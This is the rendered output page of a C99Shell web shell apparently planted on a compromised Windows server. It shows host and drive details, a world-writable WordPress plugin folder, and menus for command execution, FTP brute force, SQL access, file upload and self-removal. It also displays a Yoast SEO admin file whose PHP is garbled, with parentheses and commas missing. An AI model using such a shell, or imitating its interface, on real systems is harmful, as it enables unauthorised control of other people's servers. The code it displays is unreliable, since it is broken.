!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\admin\pages\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     advanced.php (1.25 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 */

if ( ! defined'WPSEO_VERSION' ) ) {
    
header'Status: 403 Forbidden' );
    
header'HTTP/1.1 403 Forbidden' );
    exit();
}

$active_tab filter_inputINPUT_GET'tab' );

$tabs = array(
    
'breadcrumbs' => array(
        
'label'     => __'Breadcrumbs''wordpress-seo' ),
        
'opt_group' => 'wpseo_internallinks',
    ),
    
'permalinks'  => array(
        
'label'     => __'Permalinks''wordpress-seo' ),
        
'opt_group' => 'wpseo_permalinks',
    ),
    
'rss'         => array(
        
'label'     => __'RSS''wordpress-seo' ),
        
'opt_group' => 'wpseo_rss',
    ),
);

if ( 
'' === $active_tab || ! in_array$active_tabarray_keys$tabs ) ) ) {
    
$active_tab 'breadcrumbs';
}

Yoast_Form::get_instance()->admin_headertrue$tabs$active_tab ]['opt_group'] );

?>
    <h2 class="nav-tab-wrapper">
        <?php
        
foreach ( $tabs as $tab_key => $tab_opt ) {
            
$active '';
            if ( 
$active_tab == $tab_key ) {
                
$active ' nav-tab-active';
            }
            echo 
'<a class="nav-tab' $active '" id="' $tab_key '-tab" href="' admin_url'admin.php?page=wpseo_advanced&tab=' $tab_key ) . '">' $tab_opt['label'] . '</a>';
        }
        
?>
    </h2>
    <br/>
<?php

require_once WPSEO_PATH 'admin/views/tab-' $active_tab '.php';

Yoast_Form::get_instance()->admin_footer();

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--